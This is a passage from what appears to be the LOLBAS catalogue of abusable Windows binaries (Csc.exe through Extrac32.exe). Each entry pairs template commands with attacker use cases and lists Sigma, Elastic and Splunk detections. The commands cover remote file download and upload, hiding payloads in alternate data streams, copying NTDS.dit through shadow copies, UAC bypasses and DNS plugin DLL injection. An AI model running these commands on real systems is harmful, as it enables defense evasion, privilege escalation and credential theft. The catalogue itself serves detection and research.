  - Command: csc.exe -out:{PATH:.exe} {PATH:.cs}
    Description: Use csc.exe to compile C# code, targeting the .NET Framework, stored in the specified .cs file and output the compiled version to the specified .exe path.
    Usecase: Compile attacker code on system. Bypass defensive counter measures.
    Category: Compile
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
  - Command: csc -target:library {PATH:.cs}
    Description: Use csc.exe to compile C# code, targeting the .NET Framework, stored in the specified .cs file and output the compiled version to a DLL file with the same name.
    Usecase: Compile attacker code on system. Bypass defensive counter measures.
    Category: Compile
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
  - Path: C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe
  - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_parent.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_folder.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml
  - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml
  - IOC: Csc.exe should normally not run as System account unless it is used for development.
Resources:
  - Link: https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/

================================================
FILE: yml/OSBinaries/Cscript.yml
================================================
---
Name: Cscript.exe
Description: Binary used to execute scripts in Windows
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: cscript //e:vbscript {PATH_ABSOLUTE}:script.vbs
    Description: Use cscript.exe to execute a Visual Basic script stored in an Alternate Data Stream (ADS).
    Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
    Category: ADS
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: WSH
Full_Path:
  - Path: C:\Windows\System32\cscript.exe
  - Path: C:\Windows\SysWOW64\cscript.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml
  - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml
  - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml
  - Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml
  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
  - IOC: Cscript.exe executing files from alternate data streams
  - IOC: DotNet CLR libraries loaded into cscript.exe
  - IOC: DotNet CLR Usage Log - cscript.exe.log
Resources:
  - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
  - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'

================================================
FILE: yml/OSBinaries/CustomShellHost.yml
================================================
---
Name: CustomShellHost.exe
Description: A host process that is used by custom shells when using Windows in Kiosk mode.
Author: Wietze Beukema
Created: 2021-11-14
Commands:
  - Command: CustomShellHost.exe
    Description: Executes explorer.exe (with command-line argument /NoShellRegistrationCheck) if present in the current working folder.
    Usecase: Can be used to evade defensive counter-measures
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: EXE
Full_Path:
  - Path: C:\Windows\System32\CustomShellHost.exe
Detection:
  - IOC: CustomShellHost.exe is unlikely to run on normal workstations
  - Sigma: https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_lolbin_customshellhost.yml
Resources:
  - Link: https://twitter.com/YoSignals/status/1381353520088113154
  - Link: https://docs.microsoft.com/en-us/windows/configuration/kiosk-shelllauncher
Acknowledgement:
  - Person: John Carroll
    Handle: '@YoSignals'

================================================
FILE: yml/OSBinaries/DataSvcUtil.yml
================================================
---
Name: DataSvcUtil.exe
Description: DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application.
Author: Ialle Teixeira
Created: 2020-12-01
Commands:
  - Command: DataSvcUtil /out:{PATH_ABSOLUTE} /uri:{REMOTEURL}
    Description: Upload file, credentials or data exfiltration in general
    Usecase: Upload file
    Category: Upload
    Privileges: User
    MitreID: T1567
    OperatingSystem: Windows 10
Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe
Code_Sample:
  - Code: https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml
  - IOC: The DataSvcUtil.exe tool is installed in the .NET Framework directory.
  - IOC: Preventing/Detecting DataSvcUtil with non-RFC1918 addresses by Network IPS/IDS.
  - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching DataSvcUtil.
Resources:
  - Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe
  - Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services
  - Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services
Acknowledgement:
  - Person: Ialle Teixeira
    Handle: '@NtSetDefault'

================================================
FILE: yml/OSBinaries/Desktopimgdownldr.yml
================================================
---
Name: Desktopimgdownldr.exe
Description: Windows binary used to configure lockscreen/desktop image
Author: Gal Kristal
Created: 2020-06-28
Commands:
  - Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:{REMOTEURL} /eventName:desktopimgdownldr
    Description: Downloads the file and sets it as the computer's lockscreen
    Usecase: Download arbitrary files from a web server
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10, Windows 11
Full_Path:
  - Path: c:\windows\system32\desktopimgdownldr.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml
  - IOC: desktopimgdownldr.exe that creates non-image file
  - IOC: Change of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP\LockScreenImageUrl
Resources:
  - Link: https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/
Acknowledgement:
  - Person: Gal Kristal
    Handle: '@gal_kristal'

================================================
FILE: yml/OSBinaries/DeviceCredentialDeployment.yml
================================================
---
Name: DeviceCredentialDeployment.exe
Description: Device Credential Deployment
Author: Elliot Killick
Created: 2021-08-16
Commands:
  - Command: DeviceCredentialDeployment
    Description: Grab the console window handle and set it to hidden
    Usecase: Can be used to stealthily run a console application (e.g. cmd.exe) in the background
    Category: Conceal
    Privileges: User
    MitreID: T1564
    OperatingSystem: Windows 10
Full_Path:
  - Path: C:\Windows\System32\DeviceCredentialDeployment.exe
Detection:
  - IOC: DeviceCredentialDeployment.exe should not be run on a normal workstation
  - Sigma: https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml
Acknowledgement:
  - Person: Elliot Killick
    Handle: '@elliotkillick'

================================================
FILE: yml/OSBinaries/Dfsvc.yml
================================================
---
Name: Dfsvc.exe
Description: ClickOnce engine in Windows used by .NET
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication {REMOTEURL}
    Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)
    Usecase: Use binary to bypass Application whitelisting
    Category: AWL Bypass
    Privileges: User
    MitreID: T1127.002
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: ClickOnce
      - Execute: Remote
Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml
Resources:
  - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
  - Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe
Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'

================================================
FILE: yml/OSBinaries/Diantz.yml
================================================
---
Name: Diantz.exe
Description: Binary that packages existing files into a cabinet (.cab) file
Author: Tamir Yehuda
Created: 2020-08-08
Commands:
  - Command: diantz.exe {PATH_ABSOLUTE:.exe} {PATH_ABSOLUTE}:targetFile.cab
    Description: Compress a file (first argument) into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
    Usecase: Hide data compressed into an Alternate Data Stream.
    Category: ADS
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1
    Tags:
      - Type: Compression
  - Command: diantz.exe {PATH_SMB:.exe} {PATH_ABSOLUTE:.cab}
    Description: Download and compress a remote file and store it in a CAB file on local machine.
    Usecase: Download and compress into a cab file.
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019
    Tags:
      - Type: Compression
  - Command: diantz /f {PATH:.ddf}
    Description: Execute diantz directives as defined in the specified Diamond Definition File (.ddf); see resources for the format specification.
    Usecase: Bypass command-line based detections
    Category: Execute
    Privileges: User
    MitreID: T1036
    OperatingSystem: Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019
    Tags:
      - Type: Compression
Full_Path:
  - Path: c:\windows\system32\diantz.exe
  - Path: c:\windows\syswow64\diantz.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml
  - IOC: diantz storing data into alternate data streams.
  - IOC: diantz getting a file from a remote machine or the internet.
Resources:
  - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diantz
  - Link: https://ss64.com/nt/makecab-directives.html
Acknowledgement:
  - Person: Tamir Yehuda
    Handle: '@tim8288'
  - Person: Hai Vaknin
    Handle: '@vakninhai'

================================================
FILE: yml/OSBinaries/Diskshadow.yml
================================================
---
Name: Diskshadow.exe
Description: Diskshadow.exe is a tool that exposes the functionality offered by the Volume Shadow Copy Service (VSS).
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: diskshadow.exe /s {PATH:.txt}
    Description: Execute commands using diskshadow.exe from a prepared diskshadow script.
    Usecase: Use diskshadow to exfiltrate data from VSS such as NTDS.dit
    Category: Dump
    Privileges: User
    MitreID: T1003.003
    OperatingSystem: Windows server
    Tags:
      - Execute: CMD
  - Command: diskshadow> exec {PATH:.exe}
    Description: Execute commands using diskshadow.exe to spawn child process
    Usecase: Use diskshadow to bypass defensive counter measures
    Category: Execute
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows server
    Tags:
      - Execute: CMD
Full_Path:
  - Path: C:\Windows\System32\diskshadow.exe
  - Path: C:\Windows\SysWOW64\diskshadow.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diskshadow.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml
  - IOC: Child process from diskshadow.exe
Resources:
  - Link: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
Acknowledgement:
  - Person: Jimmy
    Handle: '@bohops'

================================================
FILE: yml/OSBinaries/Dnscmd.yml
================================================
---
Name: Dnscmd.exe
Description: A command-line interface for managing DNS servers
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll {PATH_SMB:.dll}
    Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details.
    Usecase: Remotely inject dll to dns server
    Category: Execute
    Privileges: DNS admin
    MitreID: T1543.003
    OperatingSystem: Windows server
    Tags:
      - Execute: DLL
      - Execute: Remote
Full_Path:
  - Path: C:\Windows\System32\Dnscmd.exe
  - Path: C:\Windows\SysWOW64\Dnscmd.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml
  - IOC: Dnscmd.exe loading dll from UNC/arbitrary path
Resources:
  - Link: https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
  - Link: https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
  - Link: https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp
  - Link: https://twitter.com/Hexacorn/status/994000792628719618
  - Link: http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html
Acknowledgement:
  - Person: Shay Ber
  - Person: Dimitrios Slamaris
    Handle: '@dim0x69'
  - Person: Nikhil SamratAshok
    Handle: '@nikhil_mitt'

================================================
FILE: yml/OSBinaries/Esentutl.yml
================================================
---
Name: Esentutl.exe
Description: Binary for working with Microsoft Joint Engine Technology (JET) database
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: esentutl.exe /y {PATH_ABSOLUTE:.source.vbs} /d {PATH_ABSOLUTE:.dest.vbs} /o
    Description: Copies the source VBS file to the destination VBS file.
    Usecase: Copies files from A to B
    Category: Copy
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
  - Command: esentutl.exe /y {PATH_ABSOLUTE:.exe} /d {PATH_ABSOLUTE}:file.exe /o
    Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination file.
    Usecase: Copy a file and hide it in an alternate data stream to evade defensive counter measures
    Category: ADS
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
  - Command: esentutl.exe /y {PATH_ABSOLUTE}:file.exe /d {PATH_ABSOLUTE:.exe} /o
    Description: Copies the source Alternate Data Stream (ADS) to the destination EXE.
    Usecase: Extract a file hidden in an alternate data stream
    Category: ADS
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
  - Command: esentutl.exe /y {PATH_SMB:.exe} /d {PATH_ABSOLUTE}:file.exe /o
    Description: Copies the remote source EXE into an Alternate Data Stream (ADS) of the destination file.
    Usecase: Copy a remote file and hide it in an alternate data stream to evade defensive counter measures
    Category: ADS
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
  - Command: esentutl.exe /y {PATH_SMB:.source.exe} /d {PATH_SMB:.dest.exe} /o
    Description: Copies the source EXE to the destination EXE file
    Usecase: Use to copy files from one UNC path to another
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
  - Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d {PATH_ABSOLUTE:.dit}
    Description: Copies a (locked) file using Volume Shadow Copy
    Usecase: Copy/extract a locked file such as the AD database
    Category: Copy
    Privileges: Admin
    MitreID: T1003.003
    OperatingSystem: Windows 10, Windows 11, Windows 2016 Server, Windows 2019 Server
Full_Path:
  - Path: C:\Windows\System32\esentutl.exe
  - Path: C:\Windows\SysWOW64\esentutl.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_params.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml
  - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml
Resources:
  - Link: https://twitter.com/egre55/status/985994639202283520
  - Link: https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/
  - Link: https://twitter.com/bohops/status/1094810861095534592
Acknowledgement:
  - Person: egre55
    Handle: '@egre55'
  - Person: Mike Cary
    Handle: '@grayfold3d'

================================================
FILE: yml/OSBinaries/Eudcedit.yml
================================================
---
Name: Eudcedit.exe
Description: Private Character Editor Windows Utility
Author: Matan Bahar
Created: 2025-08-07
Commands:
  - Command: eudcedit
    Description: Once executed, the Private Character Editor opens. Click OK, then File -> Font Links. In the next window choose the option "Link with Selected Fonts" and click Save As, then enter the command you want to execute in the dialog that opens.
    Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
    Category: UAC Bypass
    Privileges: Administrator
    MitreID: T1548.002
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: CMD
      - Application: GUI
Full_Path:
  - Path: c:\windows\system32\eudcedit.exe
  - Path: c:\windows\syswow64\eudcedit.exe
Detection:
  - IOC: Processes spawned by eudcedit.exe.
Resources:
  - Link: https://medium.com/@matanb707/windows-fonts-exploitation-in-2025-bypassing-uac-with-eudcedit-915599705639
Acknowledgement:
  - Person: Matan Bahar
    Handle: '@Bl4ckShad3'

================================================
FILE: yml/OSBinaries/Eventvwr.yml
================================================
---
Name: Eventvwr.exe
Description: Displays Windows Event Logs in a GUI window.
Author: Jacob Gajek
Created: 2018-11-01
Commands:
  - Command: eventvwr.exe
    Description: During startup, eventvwr.exe checks the registry value `HKCU\Software\Classes\mscfile\shell\open\command` for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
    Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
    Category: UAC Bypass
    Privileges: User
    MitreID: T1548.002
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
    Tags:
      - Application: GUI
      - Execute: EXE
  - Command: ysoserial.exe -o raw -f BinaryFormatter -g DataSet -c "{CMD}" > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
    Description: During startup, eventvwr.exe deserializes the `%LOCALAPPDATA%\Microsoft\EventV~1\RecentViews` file with the .NET BinaryFormatter. A file carrying a deserialization gadget can be created using https://github.com/pwntester/ysoserial.net
    Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters.
    Category: UAC Bypass
    Privileges: Administrator
    MitreID: T1548.002
    OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
    Tags:
      - Application: GUI
      - Execute: .NetObjects
Full_Path:
  - Path: C:\Windows\System32\eventvwr.exe
  - Path: C:\Windows\SysWOW64\eventvwr.exe
Code_Sample:
  - Code: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/d31ea6253ea40789b1fc49ade79b7ec92154d12a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml
  - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/eventvwr_uac_bypass.yml
  - IOC: eventvwr.exe launching a child process other than mmc.exe
  - IOC: Creation or modification of the registry value HKCU\Software\Classes\mscfile\shell\open\command
Resources:
  - Link: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
  - Link: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1
  - Link: https://twitter.com/orange_8361/status/1518970259868626944
Acknowledgement:
  - Person: Matt Nelson
    Handle: '@enigma0x3'
  - Person: Matt Graeber
    Handle: '@mattifestation'
  - Person: Orange Tsai
    Handle: '@orange_8361'

================================================
FILE: yml/OSBinaries/Expand.yml
================================================
---
Name: Expand.exe
Description: Binary that expands one or more compressed files
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: expand {PATH_SMB:.bat} {PATH_ABSOLUTE:.bat}
    Description: Copies the source file to the destination.
    Usecase: Use to copy a file from a UNC path to a local destination
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
  - Command: expand {PATH_ABSOLUTE:.source.ext} {PATH_ABSOLUTE:.dest.ext}
    Description: Copies the source file to the destination.
    Usecase: Copies files from A to B
    Category: Copy
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
  - Command: expand {PATH_SMB:.bat} {PATH_ABSOLUTE}:file.bat
    Description: Copies the source file into an Alternate Data Stream (ADS) of the destination file
    Usecase: Copy a file into an alternate data stream to hide it
    Category: ADS
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
  - Path: C:\Windows\System32\Expand.exe
  - Path: C:\Windows\SysWOW64\Expand.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
Resources:
  - Link: https://twitter.com/infosecn1nja/status/986628482858807297
  - Link: https://twitter.com/Oddvarmoe/status/986709068759949319
Acknowledgement:
  - Person: Rahmat Nurfauzi
    Handle: '@infosecn1nja'
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'

================================================
FILE: yml/OSBinaries/Explorer.yml
================================================
---
Name: Explorer.exe
Description: Binary used for managing files and system components within Windows
Author: Jai Minton
Created: 2020-06-24
Commands:
  - Command: explorer.exe /root,"{PATH_ABSOLUTE:.exe}"
    Description: Execute the specified .exe with the parent process spawning from a new instance of explorer.exe
    Usecase: Performs execution of the specified file with an explorer.exe parent, breaking the process tree; can be used for defense evasion.
    Category: Execute
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: EXE
  - Command: explorer.exe {PATH_ABSOLUTE:.exe}
    Description: Execute the specified .exe with the parent process spawning from a new instance of explorer.exe
    Usecase: Performs execution of the specified file with an explorer.exe parent, breaking the process tree; can be used for defense evasion.
    Category: Execute
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: EXE
Full_Path:
  - Path: C:\Windows\explorer.exe
  - Path: C:\Windows\SysWOW64\explorer.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_explorer_break_process_tree.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_explorer_lolbin_execution.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/f2bc0c685d83db7db395fc3dc4b9729759cd4329/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml
  - IOC: Multiple instances of explorer.exe, or explorer.exe started with the /root command line, are suspicious.
Resources:
  - Link: https://twitter.com/CyberRaiju/status/1273597319322058752?s=20
  - Link: https://twitter.com/bohops/status/1276356245541335048
  - Link: https://twitter.com/bohops/status/986984122563391488
Acknowledgement:
  - Person: Jai Minton
    Handle: '@CyberRaiju'
  - Person: Jimmy
    Handle: '@bohops'

================================================
FILE: yml/OSBinaries/Extexport.yml
================================================
---
Name: Extexport.exe
Description: Loads a DLL with one of a few fixed names from a folder given on the command line.
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: Extexport.exe {PATH_ABSOLUTE:folder} foo bar
    Description: Loads a DLL located in the specified folder with one of the following names: mozcrt19.dll, mozsqlite3.dll, or sqlite.dll.
    Usecase: Execute dll file
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
Full_Path:
  - Path: C:\Program Files\Internet Explorer\Extexport.exe
  - Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extexport.yml
  - IOC: Extexport.exe loading a DLL from, or being executed from, a folder other than its original path
Resources:
  - Link: http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/
Acknowledgement:
  - Person: Adam
    Handle: '@hexacorn'

================================================
FILE: yml/OSBinaries/Extrac32.yml
================================================
---
Name: Extrac32.exe
Description: Extract to ADS, copy or overwrite a file with Extrac32.exe
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: extrac32 {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE}:file.exe
    Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
    Usecase: Extract data from a cab file and hide it in an alternate data stream.
    Category: ADS
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Type: Compression
